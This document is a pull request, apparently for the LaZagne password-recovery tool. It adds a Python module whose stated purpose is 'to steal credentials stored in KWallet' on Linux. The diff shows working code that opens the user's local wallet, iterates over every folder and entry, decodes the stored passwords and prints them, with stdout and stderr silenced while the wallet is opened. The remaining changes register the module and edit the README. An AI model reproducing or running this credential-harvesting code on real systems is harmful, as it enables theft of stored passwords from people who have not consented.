### PR TITLE
kde module implemented to steal credentials stored in KWallet

### DIFF
--- a/Linux/src/config/manageModules.py
+++ b/Linux/src/config/manageModules.py
@@ -1,6 +1,6 @@
 # keyring
 from softwares.wallet.gnome import Gnome
-from softwares.wallet.kde import KDE
+from softwares.wallet.kde import kde
 # browsers
 from softwares.browsers.mozilla import Mozilla
 from softwares.browsers.opera import Opera
@@ -41,6 +41,7 @@ def get_modules():
 		Pidgin(),
 		SQLDeveloper(),
 		Squirrel(),
-		Wifi()
+		Wifi(),
+		kde()
 	]
 	return moduleNames

--- a/Linux/src/softwares/wallet/gnome.py
+++ b/Linux/src/softwares/wallet/gnome.py
@@ -62,6 +62,6 @@ class Gnome(ModuleInfo):
 				print_output('Gnome keyring', pwdFound)
 			else:
 				print_debug('WARNING', 'The Gnome Keyring wallet is empty')
-		except:
-			print_debug('ERROR', 'An error occurs with the Gnome Keyring wallet')
+		except Exception,e:
+			print_debug('ERROR', 'An error occurs with the Gnome Keyring wallet: {0}'.format(e))
 		

--- a/Linux/src/softwares/wallet/kde.py
+++ b/Linux/src/softwares/wallet/kde.py
@@ -1,11 +1,50 @@
-
-# https://github.com/gaganpreet/kwallet-dump/tree/master/src
-# check avec variable d'env
-# GNOME_KEYRING_CONTROL => vide ou non
-
+import os, sys
 from config.header import Header
+from config.write_output import print_debug, print_output
+from config.moduleInfo import ModuleInfo
 
-class KDE():
+class kde(ModuleInfo):
+  	def __init__(self):
+		options = {'command': '-k', 'action': 'store_true', 'dest': 'kwallet', 'help': 'KWallet'}
+		ModuleInfo.__init__(self, 'kwallet', 'wallet', options)
 	
-	def kwallet(self):
-		Header().title_debug("Kwallet")
+	def run(self):
+		Header().title_debug("KWallet")
+		
+		if os.getuid() == 0:
+			print_debug('INFO', 'Do not run with root privileges)\n')
+			return
+		try:
+		    from PyKDE4.kdeui import KWallet
+		    from PyQt4.QtGui import QApplication
+		    pwdFound = []
+		    app = QApplication([])
+		    app.setApplicationName("KWallet")
+		    #Get the local wallet
+		    f = open(os.devnull, 'w')
+		    stdoutBackup = sys.stdout
+		    stderrBackup = sys.stderr
+		    sys.stdout = f
+		    sys.stderr = f
+		    wallet = KWallet.Wallet.openWallet(KWallet.Wallet.LocalWallet(), 0)
+		    #sys.stdout = stdoutBackup
+		    #sys.stderr = stderrBackup
+		    #Walk accros folders defined in the KWallet
+		    for folder in wallet.folderList():
+		      wallet.setFolder(folder)
+		      entries = dict()
+		      #Get entries for this folder
+		      for entry in wallet.entryList():
+			      values = {}
+			      entries[entry] = wallet.readEntry( entry )
+			      values["Folder"] = folder
+			      values["Entry"] = entry
+			      values["Password"] = (entries[entry][1].toHex().data()).decode('hex').decode('utf-8')[5:]
+			      if len(values) != 0:
+				pwdFound.append(values)
+		    # print the results
+		    print_output('Gnome keyring', pwdFound)
+		except Exception,e:
+			print_debug('ERROR', 'An error occurs with KWallet: {0}'.format(e))
+			
+#By Quentin HARDY

--- a/README.md
+++ b/README.md
@@ -33,42 +33,7 @@ __Note: For wifi passwords \ Windows Secrets, launch it with administrator privi
 Supported software
 ----
 
-| Type of tool                             |                 Windows      |                        Linux |
-|------------------------------------------|:----------------------------:|:----------------------------:|
-| **Admin sys**                            |  --------------------------  | --------------------------  |
-|                                          |  CoreFTP                     | FileZilla                   |
-|                                          |  Cyberduck                   | Environment Variables       |
-|                                          |  FileZilla                   |                             |
-|                                          |  FTPNavigator                |                             |
-|                                          |  PuttyCM                     |                             |
-|                                          |  WinSCP                      |                             |
-| **Browsers**                             |  --------------------------  | --------------------------  |
-|                                          |  Chrome                      | Firefox                     |
-|                                          |  Firefox                     | Opera                       |
-|                                          |  IE                          |                             |
-|                                          |  Opera                       |                             |
-| **Chats**                                |  --------------------------  | --------------------------  |
-|                                          |  Jitsi                       | Jitsi                       |
-|                                          |  Pidgin                      | Pidgin                      |
-|                                          |  Skype                       | Skype                       |
-| **Cloud**                                | --------------------------   | --------------------------  |
-|                                          |                              | Owncloud                    |
-| **Database**                             |  --------------------------  | --------------------------  |
-|                                          |  DBvisualizer                | DBvisualizer                |
-|                                          |  Squirrel                    | Squirrel                    |
-|                                          |  SQLdevelopper               | SQLdevelopper               |
-| **Mails**                                | --------------------------   | --------------------------  |
-|                                          |  Outlouk                     | Thunderbird                 |
-|                                          |  Thunderbird                 |                             |
-| **Svn**                                  | --------------------------   | --------------------------  |
-|                                          |  Tortoise                    |                             |
-| **Wifi**                                 |  Wireless Network            | Network Manager             |
-|                                          |  Wireless Network            | Network Manager             |
-|**Internat mechanism / Passwords storage**| --------------------------   |--------------------------   |
-|                                          |  .NET Password               | GNOME Keyring               |
-|                                          |  Generic network             | KWallet                     |
-|                                          |  Windows Hashes (LM/NT)      |                             |
-|                                          |  LSA Secrets                 |                             |
+<p align="center"><img src="./pictures/softwares.png" alt="The LaZagne project"></p>
 
 
 IE Browser history

--- a/README.md
+++ b/README.md
@@ -33,7 +33,42 @@ __Note: For wifi passwords \ Windows Secrets, launch it with administrator privi
 Supported software
 ----
 
-<p align="center"><img src="./pictures/softwares.png" alt="The LaZagne project"></p>
+| Type of tool                             |                 Windows      |                        Linux |
+|------------------------------------------|:----------------------------:|:----------------------------:|
+| **Admin sys**                            |  --------------------------  | --------------------------  |
+|                                          |  CoreFTP                     | FileZilla                   |
+|                                          |  Cyberduck                   | Environment Variables       |
+|                                          |  FileZilla                   |                             |
+|                                          |  FTPNavigator                |                             |
+|                                          |  PuttyCM                     |                             |
+|                                          |  WinSCP                      |                             |
+| **Browsers**                             |  --------------------------  | --------------------------  |
+|                                          |  Chrome                      | Firefox                     |
+|                                          |  Firefox                     | Opera                       |
+|                                          |  IE                          |                             |
+|                                          |  Opera                       |                             |
+| **Chats**                                |  --------------------------  | --------------------------  |
+|                                          |  Jitsi                       | Jitsi                       |
+|                                          |  Pidgin                      | Pidgin                      |
+|                                          |  Skype                       | Skype                       |
+| **Cloud**                                | --------------------------   | --------------------------  |
+|                                          |                              | Owncloud                    |
+| **Database**                             |  --------------------------  | --------------------------  |
+|                                          |  DBvisualizer                | DBvisualizer                |
+|                                          |  Squirrel                    | Squirrel                    |
+|                                          |  SQLdevelopper               | SQLdevelopper               |
+| **Mails**                                | --------------------------   | --------------------------  |
+|                                          |  Outlouk                     | Thunderbird                 |
+|                                          |  Thunderbird                 |                             |
+| **Svn**                                  | --------------------------   | --------------------------  |
+|                                          |  Tortoise                    |                             |
+| **Wifi**                                 |  Wireless Network            | Network Manager             |
+|                                          |  Wireless Network            | Network Manager             |
+|**Internat mechanism / Passwords storage**| --------------------------   |--------------------------   |
+|                                          |  .NET Password               | GNOME Keyring               |
+|                                          |  Generic network             | KWallet                     |
+|                                          |  Windows Hashes (LM/NT)      |                             |
+|                                          |  LSA Secrets                 |                             |
 
 
 IE Browser history


### PR DESCRIPTION
New module (*kde*) implemented to steal credentials stored in KWallet (Linux).
 
The following command should be used to install *kde4* in Ubuntu:
```bash
sudo apt-get install python-kde4
```

For information, *KUbuntu 14.04.2 LTS* has been used to test this module.
The Linux standalone version has not been created and tested.
